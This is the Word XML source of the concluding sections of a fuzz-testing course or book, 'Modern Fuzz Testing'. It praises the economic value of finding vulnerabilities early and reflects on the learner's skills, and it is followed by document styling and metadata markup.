    <w:bookmarkStart w:id="223" w:name="Xc70743f005db20659e6fa7803b5051321cf126b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Economic Value You Created</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Systematic vulnerability discovery provides substantial economic benefits. Finding security bugs during development costs 10-100 times less than fixing them after production deployment. Your fuzzing skills enable discovery of vulnerabilities that would otherwise require expensive penetration testing, incident response, or customer reports to identify.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You created this value through:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Systematic automation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that finds bugs without ongoing manual effort</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Scalable approaches</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that work across diverse application types and technology stacks</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Integration patterns</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that provide security benefits without disrupting development workflows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Measurable results</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that demonstrate concrete security improvements and return on investment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The combination creates compound value over time as you apply these techniques to more applications and share expertise with broader teams.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your investment in learning fuzzing provides lasting returns through improved application security, reduced vulnerability remediation costs, faster development cycles with earlier bug detection, and enhanced career value through specialized security expertise.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="223"/>
    <w:bookmarkStart w:id="224" w:name="Xc700cf22c5c4602b770b6cb52c945d9a435e43f"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Final Reflection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You started this journey to learn how systematic testing could find bugs that manual approaches miss. You accomplished much more: developing the analytical mindset and technical skills necessary to approach security challenges systematically rather than reactively.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The vulnerable applications provided safe environments to learn these techniques, but your real achievement is the ability to apply systematic vulnerability discovery to any application you encounter. The specific crashes you found matter less than the approach you developed for finding them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your expertise in modern fuzzing positions you to contribute to the broader challenge of building secure software systems. As applications grow more complex and attack surfaces expand, the systematic approaches you’ve mastered become increasingly valuable for identifying and fixing security vulnerabilities before they reach production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The combination of technical skills, analytical mindset, and practical experience you’ve developed through this hands-on journey provides the foundation for lasting impact on application security whether you apply these techniques individually, lead security initiatives within organizations, or contribute to the broader security community.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You are now equipped to find the bugs that matter, fix them systematically, and build more secure software through evidence-based approaches to vulnerability discovery.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="224"/>
    <w:bookmarkEnd w:id="225"/>
    <w:sectPr w:rsidR="00DE24A7" w:rsidRPr="00410C34">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5DDBA5" w14:textId="1AF71429" w:rsidR="00AD7118" w:rsidRDefault="00AD7118" w:rsidP="00AD7118">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>Modern Fuzz Testing</w:t>
    </w:r>
    <w:r>
      <w:tab/>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="97672424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r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
      </w:sdtContent>
    </w:sdt>
  </w:p>
  <w:p w14:paraId="52960CBC" w14:textId="77777777" w:rsidR="00AD7118" w:rsidRDefault="00AD7118">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6CBCDFF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489623A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00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87226752" w:numId="1">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w16cid:durableId="472987049" w:numId="2">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w16cid:durableId="588079683" w:numId="3">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w16cid:durableId="1839805120" w:numId="4">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w16cid:durableId="1451124369" w:numId="5">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w16cid:durableId="1274827761" w:numId="6">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w16cid:durableId="1361542473" w:numId="7">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w16cid:durableId="215287246" w:numId="8">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w16cid:durableId="314458353" w:numId="9">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w16cid:durableId="1402098822" w:numId="10">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Setting w:name="useWord2013TrackBottomHyphenation" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/>
  </w:compat>
  <w:rsids>
    <w:rsidRoot w:val="00DE24A7"/>
    <w:rsid w:val="000540DB"/>
    <w:rsid w:val="00410C34"/>
    <w:rsid w:val="00AD7118"/>
    <w:rsid w:val="00B64B82"/>
    <w:rsid w:val="00B832E2"/>
    <w:rsid w:val="00DE24A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D7118"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0" w:before="480"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Palatino Linotype" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Palatino Linotype"/>
      <w:b/>
      <w:bCs/>
      <w:color w:themeColor="accent1" w:val="4F81BD"/>
      <w:sz w:val="80"/>
      <w:szCs w:val="80"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Heading2" w:type="paragraph">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00AD7118"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0" w:before="200"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Palatino Linotype" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Palatino Linotype"/>
      <w:b/>
      <w:bCs/>
      <w:color w:themeColor="accent1" w:val="4F81BD"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Heading3" w:type="paragraph">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00AD7118"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0" w:before="200"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Palatino Linotype" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Palatino Linotype"/>
      <w:b/>
      <w:bCs/>
      <w:color w:themeColor="accent1" w:val="4F81BD"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>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AD7118"/>
    <w:pPr>
      <w:spacing w:after="180" w:before="180"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Palatino Linotype" w:hAnsi="Palatino Linotype"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>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iPriority w:val="99"/>
    <w:rsid w:val="00AD7118"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:pos="4680" w:val="center"/>
        <w:tab w:pos="9360" w:val="right"/>
      </w:tabs>
      <w:spacing w:after="0"/>
    </w:pPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="HeaderChar" w:type="character">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00AD7118"/>
  </w:style>
  <w:style w:styleId="Footer" w:type="paragraph">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:rsid w:val="00AD7118"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:pos="4680" w:val="center"/>
        <w:tab w:pos="9360" w:val="right"/>
      </w:tabs>
      <w:spacing w:after="0"/>
    </w:pPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="FooterChar" w:type="character">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:rsid w:val="00AD71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rn Fuzz Testing</dc:title>
  <dc:creator/>
  <cp:keywords/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-15T21:07:31Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-15T21:0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15</vt:lpwstr>
  </property>
</Properties>
</file>